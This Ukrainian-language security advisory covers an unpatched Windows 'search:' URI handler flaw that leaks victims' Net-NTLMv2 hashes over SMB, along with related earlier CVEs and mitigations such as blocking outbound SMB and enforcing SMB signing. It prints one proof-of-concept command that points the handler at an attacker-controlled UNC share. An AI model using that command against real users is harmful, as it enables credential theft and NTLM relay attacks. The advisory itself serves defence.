Дослідники з Huntress опублікували деталі невиправленої вразливості в обробнику протоколу search: у Windows, яка дозволяє зловмиснику отримати хеш NTLMv2 жертви. Проблема аналогічна раніше виправленій CVE-2026-33829 у Windows Snipping Tool, однак Microsoft відмовилася випускати виправлення, пославшись на те, що вразливість не досягає порога рівня Important або Critical. Організаціям, які використовують NTLM-аутентифікацію, рекомендується негайно застосувати компенсуючі заходи — заблокувати вихідний SMB-трафік і примусово увімкнути підписування SMB.
Механізм атаки: від URI-обробника до витоку хеша
Корінь проблеми — у тому, як Windows обробляє URI-схему search:. За даними дослідника Huntress Ендрю Шварца, параметр crumb=location: приймає довільний UNC-шлях без належної валідації. Коли користувач переходить за спеціально сформованим посиланням, операційна система ініціює SMB-з’єднання з сервером, указаним зловмисником, і в процесі автентифікації передає хеш Net-NTLMv2 жертви.
Приклад команди, яка демонструє експлуатацію:
start "" "search:query=test&crumb=location:\\10.0.1.100\share"Вектор атаки вимагає взаємодії користувача: жертва має перейти за спеціально сформованим посиланням, вбудованим у вебсторінку або електронний лист, і підтвердити запуск обробника URI. Після цього система автоматично звертається до SMB-ресурсу зловмисника, розкриваючи хеш.
Зв’язок із раніше виправленими вразливостями
Описана проблема є логічним продовженням цілого класу вразливостей, пов’язаних із витоком NTLM-хешів через URI-обробники Windows:
- CVE-2026-33829 — аналогічна вразливість в обробнику
ms-screensketch:(Windows Snipping Tool), де параметрfilePathне проходив валідацію та приймав довільні UNC-шляхи. Microsoft усунула цю проблему у квітні 2026 року, класифікувавши її як вразливість спуфінгу. - CVE-2023-35636 — використання параметра
crumbдля крадіжки NTLM-хешів було задокументовано ще в лютому 2024 року дослідниками Varonis у контексті вразливості Outlook.
За оцінкою Huntress, нова проблема використовує той самий механізм витоку NTLM, призводить до такого самого результату (розкриття Net-NTLMv2-хеша), має ті самі передумови для експлуатації та, ймовірно, відповідає рейтингу Moderate. Принципова відмінність — Microsoft вирішила не випускати патч.
Оцінка ризиків
Перехоплений NTLMv2-хеш відкриває перед зловмисником два основні напрями розвитку атаки:
- Relay-атаки — перенаправлення перехопленого хеша на внутрішні сервіси для автентифікації від імені жертви без необхідності його зламу.
- Офлайн-підбір пароля — за використання слабких паролів хеш Net-NTLMv2 може бути зламаний за допомогою інструментів на кшталт hashcat.
Найбільшому ризику піддаються корпоративні середовища, де NTLM досі використовується для автентифікації, а вихідний SMB-трафік не заблоковано на периметрі. Варто підкреслити: на момент публікації немає підтверджених випадків експлуатації цієї вразливості в реальних атаках, і вона не внесена до каталогу CISA KEV. Втім, наявність публічного PoC і відсутність патча створюють вікно можливостей для зловмисників.
Рекомендації щодо захисту
Оскільки офіційне виправлення від Microsoft відсутнє і, судячи з позиції вендора, не планується, необхідно реалізувати компенсуючі заходи на рівні інфраструктури:
- Заблокувати вихідний SMB-трафік (TCP/445 і TCP/139) на хостах, яким не потрібен доступ до зовнішніх файлових ресурсів. Це найефективніший захід, що запобігає витоку хеша за межі мережі.
- Примусово увімкнути підписування SMB (SMB Signing) — навіть якщо хеш буде перехоплено всередині мережі, його не можна буде використати для relay-атак проти сервісів із обов’язковим підписуванням.
- Вимкнути NTLM-аутентифікацію там, де це можливо, перейшовши на Kerberos. Групова політика
Network security: Restrict NTLMдозволяє поетапно обмежувати використання NTLM у домені. - Моніторинг аномальних SMB-з’єднань — налаштувати сповіщення про вихідні SMB-підключення до нетипових зовнішніх IP-адрес, що може вказувати на спробу експлуатації.
Відмова Microsoft випускати патч для вразливості з рейтингом Moderate — не виняткова ситуація, але вона перекладає відповідальність за захист на адміністраторів. Пріоритетною дією має стати блокування вихідного SMB на периметрі мережі — цей захід закриває не лише цю конкретну вразливість, а й широкий спектр атак, пов’язаних із примусовою NTLM-аутентифікацією через UNC-шляхи. Організаціям, які досі залежать від NTLM, варто розглядати це як додатковий аргумент на користь міграції на Kerberos.
